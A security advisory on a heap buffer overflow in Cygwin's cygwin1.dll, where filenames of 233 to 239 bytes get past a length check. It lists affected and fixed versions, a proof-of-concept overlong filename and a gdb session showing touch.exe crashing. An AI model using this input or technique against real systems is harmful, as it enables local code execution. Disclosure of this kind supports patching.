Cygwin is "a Linux-like environment for Windows which consists in a dll binary (cygwin1.dll) whichs emulates Linux api, and a set of tools which provide Linux look and feel". A vulnerability in Cygwin's filename length checking mechanism allows local attackers to overflow an internal buffer and cause the execution of arbitrary code.
Vulnerable Systems:
* cygwin1.dll version up to 1.5.7.
Immune Systems:
* cygwin1.dll version 1.5.24
Traditionally, linux filesystem allow 255 bytes long, nevertheless cygwin allow 239 bytes and there is a check that prevents filenames equal or major than 240.
In spite of the check, there is a 232 bytes long dynamic memory buffer where is stored the filename, so that is possible make a evil filename with 233-239 bytes long that bypasses the check and overflows the heap maximum 7 bytes.
So you had to penetrate in machine and put the evil-file and then 7 bytes of the private heap and ebx and edi registers are for the exploit.
The following file has to be uploaded, if we use touch to create it, cygwin will be bofed. AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABB
BBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOOPPPPQQQQRRRRSSSSTT
TTUUUUVVVVWWWWXXXXYYYY
$ gdb /usr/bin/touch.exe
GNU gdb 2003-09-20-cvs (cygwin-special)
...
(gdb) r AAAA ...
Program received signal SIGSEGV, Segmentation fault.
0x61091eea in getppid () from /usr/bin/cygwin1.dll
(gdb) x/i 0x61091eea
0x61091eea <getppid+2954>: mov 0xc(%ebp),%eax
(gdb) i r ebp eax
ebp 0x22006b 0x22006b
eax 0xffffffff -1
